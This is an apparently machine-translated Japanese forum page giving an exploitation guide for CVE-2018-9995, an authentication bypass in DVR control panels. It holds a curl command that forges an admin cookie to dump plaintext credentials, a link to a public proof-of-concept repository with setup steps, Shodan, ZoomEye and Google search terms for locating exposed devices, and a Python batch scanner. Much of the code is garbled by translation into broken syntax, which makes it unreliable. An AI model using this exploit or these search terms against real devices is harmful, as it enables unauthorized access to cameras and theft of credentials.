Jump to content

###脆弱性の説明

この脆弱性により、攻撃者は「Cookie: uid=admin」を変更して、このデバイスのplantext管理者資格情報を返すことにより、特定のDVRのコントロールパネルにアクセスできます。

###脆弱性の悪用

1.Uuse code

Curl 'http://:/device.rsp?opt=usercmd=list' -h 'cookie: uid=admin'

2.POC利用

https://github.com/ezelf/cve-2018-9995_dvr_credentials

git clone https://github.com/ezelf/cve-2018-9995_dvr_credentials.git

CD CVE-2018-9995_DVR_CREDENTIALS

PIPインストール-R要件。txt

byjuhurtit39022.png

roreffqxbmf9023.png

###キーワード検索

1。Zoomye:KeyWord: "/login.rsp '

ml23vf2ib5y9024.png

2.Shodan:KeyWord:HTML: '/login.rsp'

keyword:'server:gnu rsp/1.0 '

iekdogs3dqm9025.png

vuig5usnmr19026.png

3.GOOGLE:KEYWORD:INTITLE:'DVR LOGIN '

azoq1zh50af9027.png

###バッチ検証

DVRシリーズカメラバッチ検出方法3:python CVE-2018-9995_Check.py HOST.TXT

host.txtの内容は、8.8.8.8:8080またはwww.baidu.comです。スクリプトが実行されると、DVRシリーズカメラを使用してホストがresult.txtファイルに保存されます。

#著者3360hzkey

TPとしてテーブルプリントをインポートします

sysをインポートします

リクエストをインポートします

Reをインポートします

クラスColors:

green='\ 033 [32m'

red='\ 033 [0; 31m'

blue='\ 033 [*]'

orange='\ 033 [33m'

def check_host(host):

try:

print(colors.orange+'チェック:%s'%ホスト)

url='http://' + host + '/login.rsp'

rr=requests.get(url、timeout=30、aopt_redirects=false)

rr.status_code==200およびre.findall( 'gnu rsp/1.0'、rr.headers ['server']):の場合

print(Colors.Green+'[*] CVE-2018-9995検出:URLは%S'%URLです)

ff=open( 'result.txt'、 'a+')

ff.write( '%s \ n'%(url))

:を除く

合格

__name__=='__main __' :の場合

Len(Sys.Argv)2:の場合

print(colors.blue+'' 'usage: python3 cve-2018-9995.py host.txt

host.txt:127.0.0.133608080またはbaidu.com

'' ')

Len(Sys.Argv)=2:の場合

file=open(sys.argv [1])

file:のiの場合

i=i.strip()

check_host(i)

file.close()

tnopgm1udzc9028.png

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...